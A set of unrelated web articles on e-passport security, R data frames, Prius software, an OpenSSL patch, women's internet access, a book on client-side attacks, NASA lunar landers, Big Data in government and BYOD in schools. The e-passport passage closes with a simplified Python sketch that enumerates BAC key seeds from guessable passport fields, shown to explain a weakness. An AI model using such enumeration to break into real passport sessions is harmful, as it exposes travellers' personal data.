- Choice of biometrics (e.g. fingerprints, facial scan, iris patterns, etc.)
- Biometric verification methods
- Extended Access Control (enhanced privacy protection mechanism).
In terms of cryptography a variety of algorithms and various key lengths are (or will be) involved:
- Triple DES
- RSA (PSS or PKCS1)
- SHA-1, 224, 256, 384, 512
The problem with all these options is that a passport can select a set of preferred options, but an inspection system should support all of them! An associated problem in the introduction of the passport technology is that testing inspection systems becomes very cumbersome. To be sure that false passports are rejected, the full range of options should be verified against invalid (combinations of) values. Finally, a secure implementation of the various cryptographic schemes is not trivial. Only recently a vulnerability was discovered by Daniel Bleichenbacher that appeared to impact several major PKCS-1 implementations. PKCS-1 also happens to be one of the allowed signing schemes for passive authentication in e-passports.
This means that inspection systems should accept passports using this scheme. Passport forgery becomes a risk for inspection systems that have this vulnerability. Immigration authorities can defend themselves against this attack, and other hidden weaknesses, by proper evaluation of the inspection terminals to make sure that these weaknesses cannot be exploited.
Biometrics and Extended Access Control
The cornerstone of e-passport security is the scheduled use of biometric passport holder verification. The chip will contain the signed biometric data that could be verified by the inspection system. It is only this feature that would prevent look-alike fraud. All other measures do address passport forgery, but the primary concern of look-alike fraud requires a better verification that the person carrying the passport is indeed the person authenticated by the passport. Many countries have started issuance of e-passports, but the use of biometrics is delayed. There are two main reasons:
- Biometric verification only works if the software does a better job than the conventional verification by immigration officers. The debate on the effectiveness of biometric verification, and the suitability of various biometric features, is still ongoing. Also there are some secondary problems, like failure to enroll, that need to be resolved.
- Biometric data are considered sensitive. The threat of identity theft exists, and revocation of biometric data is obviously not an option. Countries do not necessarily want to share the biometric data of their citizens with all other countries.
The impact of the first issue is decreasing in the sense that the quality of biometric systems gets better over time, although it may slow down the introduction of biometrics in e-passports. At least at this moment, there is still limited experience from representative pilot projects. The second issue is more fundamental: issuing countries will always consider whom to share sensitive data with. To alleviate these concerns the ICAO standardization body has introduced the concept of Extended Access Control.
Extended Access Control (EAC)
The earlier described Basic Access Control (BAC) mechanism restricts data access to inspection systems that know the MRZ data. EAC goes further than that: it allows an e-passport to authenticate an inspection system. Only authenticated inspection systems get access to the sensitive (e.g. biometric) data. Inspection system authentication is based upon validation of certificates (indirectly) issued by the e-passport issuing country. An e-passport issuing country therefore decides which countries -- or, more precisely, which inspection system issuers -- are granted access to the sensitive data. EAC requires a rather heavy PKI. This is for two reasons:
- Each inspection system must be equipped with certificates for each country whose biometric details may be verified.
- Certificates should have a short lifetime; otherwise a stolen inspection system can be used to illegally read sensitive data.
The current EAC specification foresees a certificate lifetime of several days. The two conditions above will result in heavy traffic of certificate updates. A problem acknowledged by the EAC specification is the fact that e-passports have no concept of time. Since the RFID chips are not powered in between sessions, they do not have a reliable source of time. To solve this problem, an e-passport could remember the effective (starting) date of validated certificates, and consider this as the current date.
This could potentially lead to denial-of-service problems: if an e-passport accepts an inspection system's certificate whose effective date has not yet arrived, it may reject a subsequent inspection system certificate that is still valid. To avoid this problem the specification proposes to use only certificates of trusted domestic terminals for date synchronization. Although date synchronization based on domestic certificate effective dates would give the e-passport a rough indication of the current date, this mechanism leaves a risk for some users. Infrequent users of e-passports and users who are abroad for a long time will find that their e-passport's date lags behind significantly. For example, if an e-passport last validated a domestic EAC-capable terminal six months ago, it will reveal sensitive data to any rogue terminal stolen during this period. The above problem could be alleviated by using a different date synchronization method. Instead of using effective dates of inspection system certificates, we would use a separate source of time. For this, ICAO, or another global certification authority, should issue date certificates on a daily basis, and inspection systems should load and update their date certificates frequently. A passport could then use the date certificates signed by a trusted party to get a reliable, and more accurate, source of time. This approach could be better since we can also synchronize on foreign systems and we could use the current date instead of the inspection system certificate's effective date. With respect to EAC and biometrics, several practical and standardization issues are yet to be resolved. Although EAC, in its current specification, offers strong benefits over the simpler BAC, it is certainly not a panacea, and there is room for improvement. Nevertheless, migration to biometrics in e-passports is needed to effectively combat look-alike fraud. The global introduction of electronic passports delivered a first generation of e-passports that support digital signatures for document authentication. The system builds on the newest technology, and a high level of expertise is needed for a secure implementation and configuration of both the e-passports and the inspection systems. The technology got increasingly complex with the decision to use contactless RFID technology. Additional security measures were introduced as a result of privacy concerns. But these measures appear to offer limited privacy protection at the cost of procedural and technological complexity. The next generation of e-passports will include biometrics and Extended Access Control (EAC). The standardization of these features is unfinished and could still be improved. Future e-passports, using all security features, will offer strong fraud protection:
- Passport forgery is more difficult with an e-passport that supports active authentication.
- Look-alike fraud is more difficult with an e-passport that supports biometrics.
This level of security can only be reached if all passports implement these features; otherwise fraudsters can fall back to less advanced or legacy passports. Therefore it is important for ICAO to finalize the EAC standardization, and for issuing countries to continue the migration process and enhance their passports with biometrics.
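To make the Basic Access Control entropy problem discussed earlier more concrete, the sketch below derives a BAC-style key seed from the MRZ fields and shows how small the search space becomes when those fields are guessable or correlated. It is deliberately simplified: the real ICAO construction also includes MRZ check digits and expands the SHA-1 seed into 3DES session keys, and all sample values here are invented.

# Simplified illustration of the BAC weakness: the access key is seeded only by
# MRZ fields (document number, date of birth, date of expiry). The real ICAO
# derivation also involves check digits and 3DES key expansion; values are invented.
import hashlib
from itertools import product

def bac_seed(doc_number: str, birth_yymmdd: str, expiry_yymmdd: str) -> bytes:
    """Key seed, simplified: first 16 bytes of SHA-1 over the concatenated fields."""
    material = (doc_number + birth_yymmdd + expiry_yymmdd).encode("ascii")
    return hashlib.sha1(material).digest()[:16]

# An eavesdropper who can guess the holder's age and knows that document numbers
# are issued sequentially only has to enumerate the remaining possibilities.
candidate_docs = [f"NX{n:07d}" for n in range(1_000_000, 1_000_500)]  # sequential numbers
candidate_births = ["750312", "750313"]                                # narrowed elsewhere
expiry = "170821"

candidates = [bac_seed(d, b, expiry) for d, b in product(candidate_docs, candidate_births)]
print(f"Only {len(candidates)} candidate keys to try against a recorded session")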
<urn:uuid:d841436d-828b-437a-9d12-3f0d284afb59>
CC-MAIN-2017-09
https://www.helpnetsecurity.com/2007/12/03/on-the-security-of-e-passports/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170600.29/warc/CC-MAIN-20170219104610-00584-ip-10-171-10-108.ec2.internal.warc.gz
en
0.922424
3,320
2.625
3
With great power comes not only great responsibility, but often great complexity -- and that sure can be the case with R. The open-source R Project for Statistical Computing offers immense capabilities to investigate, manipulate and analyze data. But because of its sometimes complicated syntax, beginners may find it challenging to improve their skills after learning some basics. If you're not even at the stage where you feel comfortable doing rudimentary tasks in R, we recommend you head right over to Computerworld's Beginner's Guide to R. But if you've got some basics down and want to take another step in your R skills development -- or just want to see how to do one of these four tasks in R -- please read on. I've created a sample data set with three years of revenue and profit data from Apple, Google and Microsoft. (The source of the data was the companies themselves; fy means fiscal year.) If you'd like to follow along, you can type (or cut and paste) this into your R terminal window:
fy <- c(2010,2011,2012,2010,2011,2012,2010,2011,2012)
company <- c("Apple","Apple","Apple","Google","Google","Google","Microsoft","Microsoft","Microsoft")
revenue <- c(65225,108249,156508,29321,37905,50175,62484,69943,73723)
profit <- c(14013,25922,41733,8505,9737,10737,18760,23150,16978)
companiesData <- data.frame(fy, company, revenue, profit)
The code above will create a data frame like the one below, stored in a variable named "companiesData": (R adds its own row numbers if you don't include row names.) If you run the str() function on the data frame to see its structure, you'll see that the year is being treated as a number and not as a year or factor:
'data.frame': 9 obs. of 4 variables:
$ fy : num 2010 2011 2012 2010 2011 ...
$ company: Factor w/ 3 levels "Apple","Google",..: 1 1 1 2 2 2 3 3 3
$ revenue: num 65225 108249 156508 29321 37905 ...
$ profit : num 14013 25922 41733 8505 9737 ...
I may want to group my data by year, but don't think I'm going to be doing specific time-based analysis, so I'll turn the fy column of numbers into a column that contains R categories (called factors) instead of dates with the following command:
companiesData$fy <- as.factor(companiesData$fy)
Now we're ready to get to work. One of the easiest tasks to perform in R is adding a new column to a data frame based on one or more other columns. You might want to add up several of your existing columns, find an average or otherwise calculate some "result" from existing data in each row. There are many ways to do this in R. Some will seem overly complicated for this easy task at hand, but for now you'll have to take my word for it that some more complex options can come in handy for advanced users with more robust needs. Simply create a variable name for the new column and pass in a calculation formula as its value if, for example, you want a new column that's the sum of two existing columns:
dataFrame$newColumn <- dataFrame$oldColumn1 + dataFrame$oldColumn2
As you can probably guess, this creates a new column called "newColumn" with the sum of oldColumn1 + oldColumn2 in each row. For our sample data frame, companiesData, we could add a column for profit margin by dividing profit by revenue and then multiplying by 100:
companiesData$margin <- (companiesData$profit / companiesData$revenue) * 100
That gives us:
Whoa -- that's a lot of decimal places in the new margin column.
We can round that off to just one decimal place with the round() function; round() takes the format:
round(number(s) to be rounded, how many decimal places you want)
So, to round the margin column to one decimal place:
companiesData$margin <- round(companiesData$margin, 1)
And you'll get this result:
<urn:uuid:59d1a5ce-9ea8-4326-bd8e-8500347b4046>
CC-MAIN-2017-09
http://www.cio.com/article/2601363/developer/4-data-wrangling-tasks-in-r-for-advanced-beginners.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170613.8/warc/CC-MAIN-20170219104610-00280-ip-10-171-10-108.ec2.internal.warc.gz
en
0.774888
928
3.3125
3
Computer on Wheels
By Mel Duvall | Posted 2005-08-04
Strong sales of Toyota's Prius hybrid vehicles could be threatened by software malfunctions that leave drivers stuck in traffic. At its heart, the Prius is a computer on wheels. After slipping into the driver's seat, the owner simply pushes a button on the dash, much as you might press the On button on a computer, and the vehicle powers up. This technology is often referred to as drive-by-wire, as there are no traditional cables, hydraulic lines or linkages connecting the gas pedal to the engine, the brake pedal to the brakes, or the stick shift to the transmission. If the car is in Park or Neutral and you press down on the gas pedal, the engine will not race as it would in a normal car, because the computer determines there is no purpose in doing so. A touch-sensitive console located in the center of the dashboard provides access to a number of features, such as radio settings and climate controls, as well as updates on the vehicle's performance. The screen shows, for example, a graphic representation of the power flow from the electric motor or gas engine in the hybrid system, and the average miles per gallon achieved over the last 5 minutes and 30 minutes. Virtually every major subsystem of the vehicle, from the electric motor to the gas engine and battery-pack system, has its own electronic control unit, a computer, to control and direct operations. The major electronic control units in turn communicate with one another over a high-bandwidth network. And orchestrating the entire operation is the hybrid ECU. In action, it works like this: When initially pulling away, or driving at low speeds, the vehicle is powered by its electric motor. As the car picks up speed, the hybrid electronic control unit instructs the vehicle's gas engine to turn on and provide additional acceleration. The torque from the two motors is managed through a power splitting device called an electronic continuously variable transmission. At high speeds, the car runs primarily on the gas engine, which also recharges the vehicle's battery. The combined systems give the Prius outstanding fuel mileage: 60 miles per gallon in the city and 51 on the highway, as estimated by the Environmental Protection Agency. (Unlike conventional vehicles, the Prius gets better fuel mileage in the city because it can drive more often on the electric motor.) Its complexity, however, not only prevents most owners from tinkering under the hood, but has also been a concern for the automotive repair industry in general. "One look under the hood will scare you," says Craig Van Batenburg, owner of the Automotive Career Development Center in Worcester, Mass., which specializes in training independent garages on repairing vehicles. "They're more complicated, there are more computers, more sensors, and everything's packed in so tightly." And they can be dangerous. Power to the Prius' electric motor is supplied by a 276-volt battery pack. The average person can be killed by a 60-volt shot to the pants. Van Batenburg says safety measures are more critical than ever with the hybrids, but the independent repair industry has to learn how to handle hybrids or risk losing an increasing share of business to the dealerships. The average car owner probably isn't aware of how software updates even get into his vehicle. On most cars, a dongle, or data port, is installed just below the lower left side of the steering wheel.
When the car is brought into the repair shop, a mechanic connects to the port and runs a set of diagnostic tests. The technology is a godsend for mechanics, according to Van Batenburg. "When the check-engine light comes on, it could be one of 600 things going wrong," he says. "Without the computer systems, it could take days to pinpoint a problem." Updating the software in the Prius, or any other vehicle, is a relatively simple process. Most shops now provide mechanics with wireless laptop computers. The mechanic uses the laptop to go to a secured Web site provided by the manufacturer, and downloads the latest software update to the laptop. From there, it gets passed through the data port to the flash memory in the vehicle. The Prius stalling problem may turn out to be minor. In fact, Van Batenburg speculates that a number of the incidents could simply be a result of owners trying to squeeze every bit of mileage they can out of a tank of gas and eventually hitting empty. (A number of Prius owners posting in online forums have insisted their tanks were not empty; Len says her car had plenty of gas left when it stalled.) However, it is also just as possible that the problem could be widespread and will result in a recall. In the meantime, it doesn't appear to be affecting the vehicle's sales. Toyota says it sold 9,622 Prius vehicles in the U.S. in June, at the height of attention over the software flaw, a 119% increase over the previous year. In the first six months of 2005, gas-price-gouged consumers snapped up 53,310 of the $20,000 vehicles, compared to 21,890 in the first six months of 2004. Owners like Len say they're not bothered by the increasing amounts of software in their vehicles and, in fact, can't wait for more innovations and software-driven features to be added to the Prius. But they want Toyota and all manufacturers to get it right. "The computer techs, engineers and designers need to step up to the plate and fine-tune their craft," Len says. "Frankly, I hope I live long enough to own a flying car with whatever new technology is available to run it."
<urn:uuid:2586a889-acde-4b33-bb85-30effcea7b01>
CC-MAIN-2017-09
http://www.baselinemag.com/c/a/Projects-Processes/Software-Bugs-Threaten-Toyota-Hybrids/2
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171078.90/warc/CC-MAIN-20170219104611-00632-ip-10-171-10-108.ec2.internal.warc.gz
en
0.957635
1,182
2.96875
3
The OpenSSL project has patched a problem in the cryptographic library, but one that likely does not affect many popular applications. OpenSSL enables SSL (Secure Sockets Layer) or TLS (Transport Layer Security) encryption. Most websites use it, which is indicated in Web browsers with a padlock symbol. It's an open-source library that is widely used in applications for secure data transfers. After serious vulnerabilities were found in OpenSSL over the last couple of years, the library has been under much scrutiny by security researchers. The latest vulnerability affects versions 1.0.1 and 1.0.2. The updated versions are 1.0.2f and 1.0.1r. In some cases, OpenSSL reuses prime numbers when using the Diffie-Hellman protocol, which could allow an attacker to crack the encryption. There are some mitigating factors. An attacker would have to complete multiple handshakes with the computer he or she is trying to compromise. However, the option that reuses prime numbers is not on by default, and most applications likely are not at risk if that option has not been changed, according to the advisory. OpenSSL underpins two of the most widely used Web servers, Apache and nginx. The code library is also used to protect email servers, chat servers, virtual private networks and other networking appliances. The discovery of an alarming flaw called Heartbleed in April 2014 prompted a wide examination of OpenSSL. An audit was launched with the aim of eliminating years-old but unknown flaws.
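One quick way for readers to see whether the fix could even apply to their own environment is to check which OpenSSL build their tooling is linked against. The snippet below is a minimal sketch, not from the advisory, using only Python's standard-library ssl module; it reports the OpenSSL that Python itself was built against (not necessarily every service on the machine), and the patch-letter arithmetic assumes the 1.0.1r and 1.0.2f releases named above.

```python
import ssl

# Version string of the OpenSSL library this Python is linked against,
# e.g. "OpenSSL 1.0.2f  28 Jan 2016".
print(ssl.OPENSSL_VERSION)

# Same information as a (major, minor, fix, patch, status) tuple.
major, minor, fix, patch, _ = ssl.OPENSSL_VERSION_INFO

# Patched releases named in the advisory: 1.0.2f and 1.0.1r.
if (major, minor, fix) == (1, 0, 2) and patch >= 6:      # 'f' is the 6th patch letter
    print("1.0.2 branch at or beyond 1.0.2f")
elif (major, minor, fix) == (1, 0, 1) and patch >= 18:   # 'r' is the 18th patch letter
    print("1.0.1 branch at or beyond 1.0.1r")
else:
    print("Check whether this OpenSSL build includes the fix")
```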
<urn:uuid:73c56a94-126e-40ff-ba76-18fad6ceec92>
CC-MAIN-2017-09
http://www.csoonline.com/article/3027548/security/openssl-patches-a-severe-but-not-widespread-problem.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171078.90/warc/CC-MAIN-20170219104611-00632-ip-10-171-10-108.ec2.internal.warc.gz
en
0.945029
318
3.234375
3
Cloud Whitepaper: Bring Your Own Mobile Devices To School
HP BYOD in Education: Students and faculty are free to use personal mobile devices to access school resources while IT maintains control. Who should read this paper? School administrators, IT directors, security managers, and network managers should read this white paper to learn how HP Networking solutions simplify security and network access control to help schools make the most of bring your own device (BYOD) initiatives. In today's educational environments, more and more students, guests, and faculty are bringing their own Wi-Fi devices into the school's network. This presents a unique challenge to the IT administrator. This paper discusses the challenges and solutions IT administrators are facing and how HP is addressing the security and management of the multiple devices being introduced into the wireless/wired network. Many higher educational institutions and K-12 schools are enticed by the idea of allowing students and faculty to use their own tablet computers, notebooks, and smartphones to access school resources. However, they are concerned about the security risks—and the impact on IT operations. HP Networking is helping educational institutions realize the potential of BYOD initiatives by enabling schools to allow students and faculty to use their own mobile devices in a way that is secure and operationally efficient. HP Intelligent Management Center (IMC) provides a simple way to enforce network access control that is ideal for BYOD initiatives. Education for today's learners: Technology is an essential element to keeping today's students engaged. Demand for the expanded use of technology in education to raise academic achievement comes from virtually all constituents, from the federal government, to state education departments, to local school boards, teachers, parents, and students themselves. Tablets, notebooks, and other mobile devices take learning out of computer labs and libraries and put it directly into students' hands, especially for students who have grown up with the Internet, gaming consoles, and texting. Digital curricula allow teachers to create new levels of interactivity that are ideal for individual and team learning, developing science and math skills, and language immersion. Mobile devices open up a universe of possibilities for science labs, distance learning, and student presentations. Teachers have new ways to assess students' individual progress and provide additional instruction to students before they fall significantly behind.
<urn:uuid:b2998cff-afe4-4954-91a2-61343e2b1ee8>
CC-MAIN-2017-09
https://cloudtweaks.com/2012/10/cloud-whitepaper-bring-your-own-mobile-devices-to-school/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171463.89/warc/CC-MAIN-20170219104611-00156-ip-10-171-10-108.ec2.internal.warc.gz
en
0.93579
473
2.6875
3
Women and girls lag behind men in Internet access in many parts of the world, causing them to miss out on the economic and social benefits of being online, according to a new report from Intel. Across the developing world, there are about 25 percent fewer women than men online, said the report, one of the first to attempt to measure worldwide Internet access by women. In some areas the gap is even greater, with a 43 percent gap in sub-Saharan Africa, a 34 percent gap in the Middle East and North Africa, and a 33 percent gap in South Asia, according to the report. While many groups have acknowledged an Internet gap between the genders, the goal of the Intel report was to "quantify what that gap is, because that data didn't exist before," said Shelly Esque, vice president of Intel's corporate affairs group and president of the Intel Foundation. Women miss many benefits if they're not online, she said. "We believe, and I think there's plenty of evidence to support, that the Internet is a gateway to so much opportunity, information around health, education, economic opportunities," she said. "This list goes on and on. If women are denied access to that information, then they're denied opportunity to thrive in their communities." Promoting better Internet access for women is a good way to help improve economies around the world, added Melanne Verveer, ambassador at large for global women's issues at the U.S. Department of State, which, along with the United Nations and World Pulse, supported the study. "The dramatic differential in access to the Internet results in fewer opportunities for women to reach their full potential and a loss of significant economic and social contributions to their families and communities," Verveer wrote in the report. The Intel study found that Internet access can boost women's income. About half of survey respondents use the Web to search for and apply for jobs, and 30 percent have used the Internet to earn additional income, Intel said. The study is based on analysis of global databases and interviews and surveys of 2,200 women and girls in Egypt, India, Mexico and Uganda. Intel recommended a new global effort to get more women and girls online, with governments and private industry working together to bridge the gender gap. The study predicted that an additional 450 million women and girls will come online in the next three years through organic growth, but a concerted effort could bring an additional 150 million online. Private industry can work to make Internet access affordable and provide more free content that appeals to women, the study said. Governments can develop national plans for increasing broadband penetration, it recommended. With 600 million more women online during the next three years, nearly a third of them would improve their ability to generate new income, and the new online users could create a market of US$50 billion to $70 billion in IT and telecom sales, Intel estimated. One barrier to bringing more women online is an attitude among some women, the study said. One in five women in India and Egypt believes the Internet is not appropriate for them, the study said. Some of those women don't believe the Internet has information they need, and others are concerned their families wouldn't approve of them being online, the study said. Part of the solution is educating women about what's available online and targeting information to groups who need it, Esque said.
In some areas, women may be interested in maternal health information, and in other areas, weather and crop information, she said. "Until you know what's possible, it's hard to imagine how this can impact your life," she said. "It's incumbent on all the players, the private and the public sector, to think about, what is that local, relevant information?" Grant Gross covers technology and telecom policy in the U.S. government for The IDG News Service. Follow Grant on Twitter at GrantGross. Grant's e-mail address is [email protected].
<urn:uuid:b80b1bbb-6b1c-49f9-aaaa-80fd38e0bf49>
CC-MAIN-2017-09
http://www.networkworld.com/article/2162688/data-center/study--women-lagging-in-internet-adoption-in-many-countries.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173866.98/warc/CC-MAIN-20170219104613-00032-ip-10-171-10-108.ec2.internal.warc.gz
en
0.96234
812
2.640625
3
Authors: Rob Shimonski and Sean-Philip Oriyano Whether it's security vulnerabilities in software used by millions of home users and employees, or the natural human tendency to trust what comes at us, even the most complex and far-reaching attacks today start with the compromise of a single endpoint. Unfortunately, this trend will continue until we either all learn to avoid these threats, or software and hardware developers churn out completely secure solutions – which means never. But, let's do what we can, shall we? Educating ourselves shouldn't be a chore, but a welcome option. About the authors: Sean-Philip Oriyano has spent his time in the field working with nearly all aspects of IT and management with special emphasis on Information Security concepts, techniques, and practices. Rob Shimonski is a best-selling author and editor with over 15 years' experience developing, producing and distributing print media in the form of books, magazines and periodicals. Inside the book: It is natural for attackers to choose to strike where defenses are poorest. Servers and networks have become well-defended, so attackers are going for the users and their computers and devices. Client-side attacks are many and varied, and this book addresses them all. Using Cross-Site Scripting (XSS) as an introductory example, the authors have thoroughly dissected the attack and walk readers through it step by step. Without getting into too many details at first, they explained simply the environment in which it is deployed, how it's planned, and the main types of vulnerabilities this and other client-side attacks depend on for success. Client-side attacks can be aimed at popular computer software such as browsers and mail clients, web applications, active content technologies, and mobile devices. Each of these attack types gets a chapter, but browser attacks encompass four. It is understandable, as they are the users' main door to the Internet. After a brief explanation of the common functions and features of modern browsers, the authors addressed those of Internet Explorer, Firefox, Chrome, Safari and Opera, along with their known flaws and security issues, then followed up with advanced web browser defenses. Peppered with tips, warnings and screenshots, this last chapter is a great source of information on how to "lock down" each of the browsers and their various active content elements such as Java, Flash, ActiveX, and others introduced and explained beforehand. Email client attacks – spam, malware, malicious code, DoS, hoaxes and phishing – are detailed and accompanied with concrete and theoretical examples. The chapters dedicated to web application and mobile attacks are thorough, and the latter should be compulsory reading for everyone owning a "smart" mobile device – whether it is one of Apple's iDevices, those running on Google's Android OS, or RIM's Blackberry. Finally, the authors address the necessity of security planning (security policies), and of considering security needs from the very start. The pros for securing apps and infrastructure with things like digital signatures, certificates and PKI are explained, as well as these solutions' limitations, and the book finishes with methods for securing clients (AV, patching, etc.). I really enjoyed how the authors eased gently into the subject, each new chapter offering enough new information to make it interesting, but not too much to prevent readers from feeling overwhelmed.
They explained things in a way that should be understandable to anyone using the software and apps daily and looking for ways to make their computer use safer. I would recommend this book to inquisitive home users, but have to say that security professionals – apart from those only beginning their work in the field – will not find much to hold their interest.
<urn:uuid:20952425-a88c-4b17-9bf1-037e9bdb1c82>
CC-MAIN-2017-09
https://www.helpnetsecurity.com/2013/03/20/client-side-attacks-and-defense/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170914.10/warc/CC-MAIN-20170219104610-00152-ip-10-171-10-108.ec2.internal.warc.gz
en
0.935652
779
2.546875
3
The people behind the Inspiration Mars Foundation -- which on Wednesday announced plans to send a manned spacecraft on a 510-day fly-by mission to Mars -- say this on their website: "We are steadfastly committed to the safety, health and overall well-being of our crew. We will only fly this mission if we are convinced that it is safe to do." Let's hope that's true, because launching humans on such a long and faraway mission into space before we're technologically capable and reasonably certain about the health effects of such a prolonged journey just isn't worth it, at least in my opinion. The foundation, headed by U.S. multimillionaire and first space tourist Dennis Tito, wants to send a two-person crew (a man and a woman) to Mars in 2018, when a rare planetary alignment would allow for a relatively short round-trip of about 500 days. The craft wouldn't even go into Mars orbit, but instead would fly within 100 miles and then "sling-shot" its way back toward Earth. The problem is, even while the Inspiration Mars Foundation assures it won't go through with the mission if it is unconvinced it would be safe, Tito tells Space.com that the two-person crew essentially are going to be guinea pigs: SPACE.com: What is the scientific value of a manned mission to Mars, if the crew won't be landing on the planet? Tito: At first, I thought this is not a science mission. This is for inspiration; it's a test flight to show we can get there. You're going to learn a lot about the engineering problems. But then as I started learning more about the life sciences, apparently [the benefits] are huge. There hasn't been really any information on human behavior in this kind of environment. The impact of radiation, the isolation — the academics are all very excited. It'd be a huge scientific value in the life sciences. And let's not forget all the other things that happen to the human body in space. A Russian experiment in which participants lived in the equivalent of deep space for 17 months showed that long trips in space can have drastic effects on sleep patterns and fitness. Given that prolonged sitting can be fatal, this is something to think about. Then there's bone loss, heart atrophy, nausea and headaches -- all conditions of modern space travel. While we're at it, let's throw in the recent NASA-supported study reporting that space travel is harmful to the brain and could accelerate Alzheimer's disease. And the "impact of radiation," as Tito puts it, is described in Wikipedia: The potential acute and chronic health effects of space radiation, as with other ionizing radiation exposures, involve both direct damage to DNA and indirect effects due to generation of reactive oxygen species. ...By one NASA estimate, for each year that astronauts spend in deep space, about one-third of their DNA will be hit directly by heavy ions. Thus, loss of critical cells in highly complex and organized functional structures like the central nervous system (CNS) could result in compromised astronaut function, such as changes in sensory perception, proprioception, and behavior or longer term decrements in cognitive and behavioral functions. So you lift off from Earth as a fully functioning human astronaut and you return (if you return) as ... what? I've said it before, and I'll say it again: As eager as I am to see us explore the stars, rushing into it is only going to lead to unnecessary lives lost. I understand exploration requires risk, but it shouldn't require recklessness. But that's just me. What do readers think?
In our eagerness to go to Mars, are we rushing into disaster?
<urn:uuid:9f6bd81a-1568-435d-8615-ad9e5bf5d0be>
CC-MAIN-2017-09
http://www.itworld.com/article/2713145/hardware/wanted--2-human-guinea-pigs-for-premature-flight-to-mars.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171163.39/warc/CC-MAIN-20170219104611-00328-ip-10-171-10-108.ec2.internal.warc.gz
en
0.95823
766
2.78125
3
NASA is looking for help creating a new robotic rover that will deliver cargo to the surface of the moon. The robotic machine NASA wants to build must be able to ferry cargo weighing 66 pounds to 1,102 pounds to various lunar sites. The space agency is seeking proposals from the private sector and plans to create a partnership to build a robotic lunar lander. The program is dubbed Lunar CATALYST, for Lunar Cargo Transportation and Landing by Soft Touchdown. "As NASA pursues an ambitious plan for humans to explore an asteroid and Mars, U.S. industry will create opportunities for NASA to advance new technologies on the moon," said Greg Williams, NASA's deputy associate administrator for the Human Exploration and Operations Mission Directorate. "[This] will help us advance our goals to reach farther destinations." NASA noted that, in a partnership, the agency would be able to contribute the technical expertise of NASA staff, access to NASA center test facilities, equipment loans, and software for lander development and testing. NASA will host a pre-proposal teleconference on Jan. 27 to give companies a chance to ask questions about the program. Proposals are due by March 17. The winners are expected to be announced in April. This article, NASA needs commercial help to bring robots on the moon, was originally published at Computerworld.com. Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed. Her email address is [email protected]. Read more about emerging technologies in Computerworld's Emerging Technologies Topic Center. This story, "NASA Needs Commercial Help Putting Robots on the Moon" was originally published by Computerworld.
<urn:uuid:b0c8e279-fb96-4e2c-a4e2-51f626418bc2>
CC-MAIN-2017-09
http://www.cio.com/article/2379476/government/nasa-needs-commercial-help-putting-robots-on-the-moon.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171608.86/warc/CC-MAIN-20170219104611-00504-ip-10-171-10-108.ec2.internal.warc.gz
en
0.910751
375
2.9375
3
In his 1990 book "The New Realities," Peter Drucker noted: "Knowledge is information that changes something or somebody - either by becoming grounds for action, or by making an individual (or an institution) capable of different and more effective action." And that is what Big Data is delivering . . . new knowledge, new insights and new actions, all of which will give us new problems to deal with. Already Big Data is making an impact in government, which, when you think of it, is kind of a "slam dunk" given bureaucracy and huge amounts of data always go hand in hand. So, it will come as no surprise that a recent study conducted by the TechAmerica Foundation and commissioned by SAP AG, discovered that "82% of public IT officials say the effective use of real-time Big Data is the way of the future." Moreover, "83% of Federal IT officials say Big Data can save 10% ($380 billion) or more from the federal budget, or about $1,200 per American." Wow! Sounds fantastic! The study also found that government officials cited the potential of Big Data in lifesaving, crime reduction and improving the quality of citizens' lives. All of these advances were seen as coming from using predictive analytics to mine Big Data, for example, to "develop predictive models about when and where crimes are likely to occur." It also noted that, if the government can gain "insight into huge volumes of data across agencies, the government can provide improved, personalized services to citizens." That sounds great too! We'll get better services for less money! Woo-hoo. But, wait! Hold hard! Any smart person has to wonder what might be the downsides of this brave new whirl of improved government data. What did these government IT people see as the negatives? First, Big Data comes with a very big price tag and the study showed government officials recognize this. Good. Next was "a lack of clarity about Big Data's level of ROI." Very good! And the biggest negative? "The biggest barrier for taking advantage of Big Data is privacy concerns, according to 47% of federal IT officials. Officials believe the challenge will be explaining that Big Data analytics is not equivalent to 'Big Brother.'" On the last point, the officials are dead wrong. In fact, staggeringly wrong. The challenge is about explaining how it would be possible for Big Data analytics not to become "Big Brother"! [TIPS: 7 steps to Big Data success] Already Big Data and predictive analytics in corporate hands has demonstrated unexpected consequences (see the story of Target's data mining program to identify pregnant women for a targeted marketing campaign which I discussed almost a year ago). Now, combine those corporate Big Data resources with the real possibility of the government being able to access them through the provisions of the newly resurrected Cyber Intelligence Sharing and Protection Act (CISPA) -- of which bill sponsor Rep. Dutch Ruppersberger said he didn't see any reason why businesses needed to hide personal data from the government -- and throw in a generous helping of mission creep and what have you got? Bigger Brother on steroids. The first thing you can do about this is make sure that CISPA and the inevitable procession of similar legislation that will follow gets as little traction as possible by joining organizations such as Demand Progress to petition congress to stop the insanity. The second thing? Brace yourself, because Predictive Big Data Analytics will be part of government faster than you can say "fiscal cliff." 
As for a third thing, pray. Gibbs has his fingers crossed in Ventura, Calif. The government already knows what you think but tell [email protected] anyway. Also follow him on Twitter and App.net (@quistuipater) and on Facebook (quistuipater) and check out the Tech Predictions blog. Read more about software in Network World's Software section. This story, "Big data, big business, big government, bigger brother" was originally published by Network World.
<urn:uuid:c109768f-7a5a-43f8-929e-908a07acbae2>
CC-MAIN-2017-09
http://www.itworld.com/article/2712594/big-data/big-data--big-business--big-government--bigger-brother.html?page=2
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170651.78/warc/CC-MAIN-20170219104610-00324-ip-10-171-10-108.ec2.internal.warc.gz
en
0.955711
829
2.640625
3
